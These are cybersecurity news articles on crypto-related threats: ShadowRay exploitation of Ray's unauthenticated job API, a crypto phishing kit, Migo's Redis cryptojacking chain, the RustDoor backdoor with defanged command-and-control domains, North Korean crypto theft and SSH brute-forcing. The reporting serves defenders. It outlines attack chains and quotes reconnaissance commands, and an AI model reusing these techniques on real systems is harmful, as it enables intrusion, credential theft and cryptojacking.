Mar 27, 2024NewsroomVulnerability / Data Security

Cybersecurity researchers are warning that threat actors are actively exploiting a “disputed” and unpatched vulnerability in an open-source artificial intelligence (AI) platform called Anyscale Ray to hijack computing power for illicit cryptocurrency mining.

“This vulnerability allows attackers to take over the companies’ computing power and leak sensitive data,” Oligo Security researchers Avi Lumelsky, Guy Kaplan, and Gal Elbaz said in a Tuesday disclosure.

“This flaw has been under active exploitation for the last seven months, affecting sectors like education, cryptocurrency, biopharma, and more.”

The campaign, ongoing since September 2023, has been codenamed ShadowRay by the Israeli application security firm. It also marks the first time AI workloads have been targeted in the wild through shortcomings underpinning the AI infrastructure.

Ray is an open-source, fully-managed compute framework that allows organizations to build, train, and scale AI and Python workloads. It consists of a core distributed runtime and a set of AI libraries for simplifying the ML platform.

It’s used by some of the biggest companies, including OpenAI, Uber, Spotify, Netflix, LinkedIn, Niantic, and Pinterest, among others.

The security vulnerability in question is CVE-2023-48022 (CVSS score: 9.8), a critical missing authentication bug that allows remote attackers to execute arbitrary code via the job submission API. It was reported by Bishop Fox alongside two other flaws in August 2023.

The cybersecurity company said the lack of authentication controls in two Ray components, Dashboard, and Client, could be exploited by “unauthorized actors to freely submit jobs, delete existing jobs, retrieve sensitive information, and achieve remote command execution.”

This makes it possible to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials. Anyscale, in an advisory published in November 2023, said it does not plan to fix the issue at this point in time.

“That Ray does not have authentication built in – is a long-standing design decision based on how Ray’s security boundaries are drawn and consistent with Ray deployment best practices, though we intend to offer authentication in a future version as part of a defense-in-depth strategy,” the company noted.

It also cautions in its documentation that it’s the platform provider’s responsibility to ensure that Ray runs in “sufficiently controlled network environments” and that developers can access Ray Dashboard in a secure fashion.

Oligo said it observed the shadow vulnerability being exploited to breach hundreds of Ray GPU clusters, potentially enabling the threat actors to get hold of a trove of sensitive credentials and other information from compromised servers.

This includes production database passwords, private SSH keys, access tokens related to OpenAI, HuggingFace, Slack, and Stripe, the ability to poison models, and elevated access to cloud environments from Amazon Web Services, Google Cloud, and Microsoft Azure.

In many of the instances, the infected instances have been found to be hacked with cryptocurrency miners (e.g., XMRig, NBMiner, and Zephyr) and reverse shells for persistent remote access.

The unknown attackers behind ShadowRay have also utilized an open-source tool named Interactsh to fly under the radar.

“When attackers get their hands on a Ray production cluster, it is a jackpot,” the researchers said. “Valuable company data plus remote code execution makes it easy to monetize attacks — all while remaining in the shadows, totally undetected (and, with static security tools, undetectable).”

Mar 26, 2024NewsroomMoney Laundering / Digital Currency

The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned three cryptocurrency exchanges for offering services used to evade economic restrictions imposed on Russia following its invasion of Ukraine in early 2022.

This includes Bitpapa IC FZC LLC, Crypto Explorer DMCC (AWEX), and Obshchestvo S Ogranichennoy Otvetstvennostyu Tsentr Obrabotki Elektronnykh Platezhey (TOEP).

In all, the designations cover thirteen entities and two individuals operating in the Russian financial services and technology sectors.

“Many of the individuals and entities designated today facilitated transactions or offered other services that helped OFAC-designated entities evade sanctions,” the Treasury said, adding the action seeks to “target companies servicing Russia’s core financial infrastructure and curtail Russia’s use of the international financial system to further its war against Ukraine.”

Bitpapa, which offers virtual currency exchange to Russian nationals, has been accused of facilitating transactions worth millions of dollars with sanctioned Russian entities Hydra Market and Garantex.

Crypto Explorer, the Treasury said, offers currency conversion services between virtual currencies, rubles, and UAE dirhams.

“AWEX offers cash services at its offices in Moscow and Dubai and also loads funds onto credit cards associated with OFAC-designated Russian banks such as Sberbank and Alfa-Bank,” it added.

Also sanctioned is another virtual currency exchange run by TOEP that’s alleged to have enabled digital payments in rubles and virtual currencies to sanctioned entities such as Sberbank, Alfa-Bank, and Hydra Market.

The penalty list also features Moscow-based fintech companies such as B-Crypto, Masterchain and Laitkhaus, which have partnered with sanctioned Russian banks to issue, exchange, and transfer cryptocurrency assets.

Pursuant to the sanctions, all properties and interests in the U.S. connected to designated individuals and entities will be frozen. Furthermore, entities at least 50% owned directly or indirectly by one or more blocked persons will also be subject to the blockade.

“Russia is increasingly turning to alternative payment mechanisms to circumvent U.S. sanctions and continue to fund its war against Ukraine,” said Brian E. Nelson, Under Secretary of the Treasury for Terrorism and Financial Intelligence.

“As the Kremlin seeks to leverage entities in the financial technology space, Treasury will continue to expose and disrupt the companies that seek to help sanctioned Russian financial institutions reconnect to the global financial system.”

Mar 01, 2024NewsroomPhishing Kit / Cryptocurrency

A novel phishing kit has been observed impersonating the login pages of well-known cryptocurrency services as part of an attack cluster designed to primarily target mobile devices.

“This kit enables attackers to build carbon copies of single sign-on (SSO) pages, then use a combination of email, SMS, and voice phishing to trick the target into sharing usernames, passwords, password reset URLs, and even photo IDs from hundreds of victims, mostly in the United States,” Lookout said in a report.

Targets of the phishing kit include employees of the Federal Communications Commission (FCC), Binance, Coinbase, and cryptocurrency users of various platforms like Binance, Coinbase, Gemini, Kraken, ShakePay, Caleb & Brown, and Trezor. More than 100 victims have been successfully phished to date.

The phishing pages are designed such that the fake login screen is displayed only after the victim completes a CAPTCHA test using hCaptcha, thus preventing automated analysis tools from flagging the sites.

In some cases, these pages are distributed via unsolicited phone calls and text messages by spoofing a company’s customer support team under the pretext of securing their account after a purported hack.

Once the user enters their credentials, they are either asked to provide a two-factor authentication (2FA) code or asked to “wait” while it claims to verify the provided information.

“The attacker likely attempts to log in using these credentials in real time, then redirects the victim to the appropriate page depending on what additional information is requested by the MFA service the attacker is trying to access,” Lookout said.

The phishing kit also attempts to give an illusion of credibility by allowing the operator to customize the phishing page in real-time by providing the last two digits of the victim’s actual phone number and selecting whether the victim should be asked for a six or seven digit token.

The one-time password (OTP) entered by the user is then captured by the threat actor, who uses it to sign in to the desired online service using the provided token. In the next step, the victim can be directed to any page of the attacker’s choosing, including the legitimate Okta login page or a page that displays customized messages.

Lookout said the campaign shares similarities with that of Scattered Spider, specifically in its impersonation of Okta and the use of domains that have been previously identified as affiliated with the group.

“Despite the URLs and spoofed pages looking similar to what Scattered Spider might create, there are significantly different capabilities and C2 infrastructure within the phishing kit,” the company said. “This type of copycatting is common amongst threat actor groups, especially when a series of tactics and procedures have had so much public success.”

It’s currently also not clear if this is the work of a single threat actor or a common tool being used by different groups.

“The combination of high quality phishing URLs, login pages that perfectly match the look and feel of the legitimate sites, a sense of urgency, and consistent connection through SMS and voice calls is what has given the threat actors so much success stealing high quality data,” Lookout noted.

The development comes as Fortra revealed that financial institutions in Canada have come under the target of a new phishing-as-service (PhaaS) group called LabHost, overtaking its rival Frappo in popularity in 2023.

LabHost’s phishing attacks are pulled off by means of a real-time campaign management tool named LabRat that makes it possible to stage an adversary-in-the-middle (AiTM) attack and capture credentials and 2FA codes.

Also developed by the threat actor is an SMS spamming tool dubbed LabSend that provides an automated method for sending links to LabHost phishing pages, thereby allowing its customers to mount smishing campaigns at scale.

“LabHost services allow threat actors to target a variety of financial institutions with features ranging from ready-to-use templates, real-time campaign management tools, and SMS lures,” the company said.

Feb 20, 2024NewsroomServer Security / Cryptojacking

A novel malware campaign has been observed targeting Redis servers for initial access with the ultimate goal of mining cryptocurrency on compromised Linux hosts.

“This particular campaign involves the use of a number of novel system weakening techniques against the data store itself,” Cado security researcher Matt Muir said in a technical report.

The cryptojacking attack is facilitated by a malware codenamed Migo, a Golang ELF binary that comes fitted with compile-time obfuscation and the ability to persist on Linux machines.

The cloud security company said it detected the campaign after it identified an “unusual series of commands” targeting its Redis honeypots that are engineered to lower security defenses by disabling the following configuration options –

It’s suspected that these options are turned off in order to send additional commands to the Redis server from external networks and facilitate future exploitation without attracting much attention.

This step is then followed by threat actors setting up two Redis keys, one pointing to an attacker-controlled SSH key and the other to a cron job that retrieves the malicious primary payload from a file transfer service named Transfer.sh, a technique previously spotted in early 2023.

The shell script to fetch Migo using Transfer.sh is embedded within a Pastebin file that’s, in turn, obtained using a curl or wget command.

Persistence

The Go-based ELF binary, besides incorporating mechanisms to resist reverse engineering, acts as a downloader for an XMRig installer hosted on GitHub. It’s also responsible for performing a series of steps to establish persistence, terminate competing miners, and launch the miner.

On top of that, Migo disables Security-Enhanced Linux (SELinux) and searches for uninstallation scripts for monitoring agents bundled in compute instances from cloud providers such as Qcloud and Alibaba Cloud. It further deploys a modified version (“libsystemd.so”) of a popular user-mode rootkit named libprocesshider to hide processes and on-disk artifacts.

It’s worth pointing out that these actions overlap with tactics adopted by known cryptojacking groups like TeamTNT, WatchDog, Rocke, and threat actors associated with the SkidMap malware.

“Interestingly, Migo appears to recursively iterate through files and directories under /etc,” Muir noted. “The malware will simply read files in these locations and not do anything with the contents.”

“One theory is this could be a (weak) attempt to confuse sandbox and dynamic analysis solutions by performing a large number of benign actions, resulting in a non-malicious classification.”

Another hypothesis is that the malware is looking for an artifact that’s specific to a target environment, although Cado said it found no evidence to support this line of reasoning.

“Migo demonstrates that cloud-focused attackers are continuing to refine their techniques and improve their ability to exploit web-facing services,” Muir said.

“Although libprocesshider is frequently used by cryptojacking campaigns, this particular variant includes the ability to hide on-disk artifacts in addition to the malicious processes themselves.”

Feb 16, 2024NewsroomEndpoint Security / Cryptocurrency

Several companies operating in the cryptocurrency sector are the target of a newly discovered Apple macOS backdoor codenamed RustDoor.

RustDoor was first documented by Bitdefender last week, describing it as a Rust-based malware capable of harvesting and uploading files, as well as gathering information about the infected machines. It’s distributed by masquerading itself as a Visual Studio update.

While prior evidence uncovered at least three different variants of the backdoor, the exact initial propagation mechanism remained unknown.

That said, the Romanian cybersecurity firm subsequently told The Hacker News that the malware was used as part of a targeted attack rather than a shotgun distribution campaign, noting that it found additional artifacts that are responsible for downloading and executing RustDoor.

“Some of these first stage downloaders claim to be PDF files with job offerings, but in reality, are scripts that download and execute the malware while also downloading and opening an innocuous PDF file that bills itself as a confidentiality agreement,” Bogdan Botezatu, director of threat research and reporting at Bitdefender, said.

Since then, three more malicious samples that act as first-stage payloads have come to light, each of them purporting to be a job offering. These ZIP archives predate the earlier RustDoor binaries by nearly a month.

The new component of the attack chain – i.e., the archive files (“Jobinfo.app.zip” or “Jobinfo.zip”) – contains a basic shell script that’s responsible for fetching the implant from a website named turkishfurniture[.]blog. It’s also engineered to preview a harmless decoy PDF file (“job.pdf”) hosted on the same site as a distraction.

Bitdefender said it also detected four new Golang-based binaries that communicate with an actor-controlled domain (“sarkerrentacars[.]com”), whose purpose is to “collect information about the victim’s machine and its network connections using the system_profiler and networksetup utilities, which are part of the macOS operating system.

In addition, the binaries are capable of extracting details about the disk via “diskutil list” as well as retrieving a wide list of kernel parameters and configuration values using the “sysctl -a” command.

A closer investigation of the command-and-control (C2) infrastructure has also revealed a leaky endpoint (“/client/bots”) that makes it possible to glean details about the currently infected victims, including the timestamps when the infected host was registered and the last activity was observed.

The development comes as South Korea’s National Intelligence Service (NIS) revealed that an IT organization affiliated with the Workers’ Party of North Korea’s Office No. 39 is generating illicit revenue by selling thousands of malware-laced gambling websites to other cybercriminals for stealing sensitive data from unsuspecting gamblers.

The company behind the malware-as-a-service (MaaS) scheme is Gyeongheung (also spelled Gyonghung), a 15-member entity based in Dandong that has allegedly received $5,000 from an unidentified South Korean criminal organization in exchange for creating a single website and $3,000 per month for maintaining the website, Yonhap News Agency reported.

Jan 08, 2024NewsroomCryptocurrency / Financial Crime

Threat actors affiliated with the Democratic People’s Republic of Korea (also known as North Korea) have plundered at least $600 million in cryptocurrency in 2023.

The DPRK “was responsible for almost a third of all funds stolen in crypto attacks last year, despite a 30% reduction from the USD 850 million haul in 2022,” blockchain analytics firm TRM Labs said last week.

“Hacks perpetrated by the DPRK were on average ten times as damaging as those not linked to North Korea.”

There are indications that additional breaches targeting the crypto sector towards the end of 2023 could push this figure higher to around $700 million.

The targeting of cryptocurrency companies is not new for North Korean state-sponsored actors, who have stolen about $3 billion since 2017.

These financially motivated attacks are seen as a crucial revenue-generation mechanism for the sanctions-hit nation, funding its weapons of mass destruction (WMD) and ballistic missile programs.

The intrusions leverage social engineering to lure targets and typically aim to compromise private keys and seed phrases – which are used to safeguard digital wallets – and then use them to gain unauthorized access to the victims’ assets and transfer them to wallets under the threat actor’s control.

“They are then swapped mostly for USDT or Tron and converted to hard currency using high-volume OTC brokers,” TRM Labs said.

The company further noted that DPRK hackers continued to explore other money laundering tools after the U.S. Treasury Department sanctioned a crypto mixer service known as Sinbad for processing a chunk of their proceeds, indicating constant evolution despite law enforcement pressure.

“With nearly USD 1.5 billion stolen in the past two years alone, North Korea’s hacking prowess demands continuous vigilance and innovation from business and governments,” TRM Labs said.

Dec 27, 2023NewsroomMalware / Server Security

Poorly secured Linux SSH servers are being targeted by bad actors to install port scanners and dictionary attack tools with the goal of targeting other vulnerable servers and co-opting them into a network to carry out cryptocurrency mining and distributed denial-of-service (DDoS) attacks.

“Threat actors can also choose to install only scanners and sell the breached IP and account credentials on the dark web,” the AhnLab Security Emergency Response Center (ASEC) said in a report on Tuesday.

In these attacks, adversaries try to guess a server’s SSH credentials by running through a list of commonly used combinations of usernames and passwords, a technique called dictionary attack.

Should the brute-force attempt be successful, it’s followed by the threat actor deploying other malware, including scanners, to scan for other susceptible systems on the internet.

Specifically, the scanner is designed to look for systems where port 22 — which is associated with the SSH service — is active and then repeats the process of staging a dictionary attack in order to install malware, effectively propagating the infection.

Another notable aspect of the attack is the execution of commands such as “grep -c ^processor /proc/cpuinfo” to determine the number of CPU cores.

“These tools are believed to have been created by PRG old Team, and each threat actor modifies them slightly before using them in attacks,” ASEC said, adding there is evidence of such malicious software being used as early as 2021.

To mitigate the risks associated with these attacks, it’s recommended that users rely on passwords that are hard to guess, periodically rotate them, and keep their systems up-to-date.

The findings come as Kaspersky revealed that a novel multi-platform threat called NKAbuse is leveraging a decentralized, peer-to-peer network connectivity protocol known as NKN (short for New Kind of Network) as a communications channel for DDoS attacks.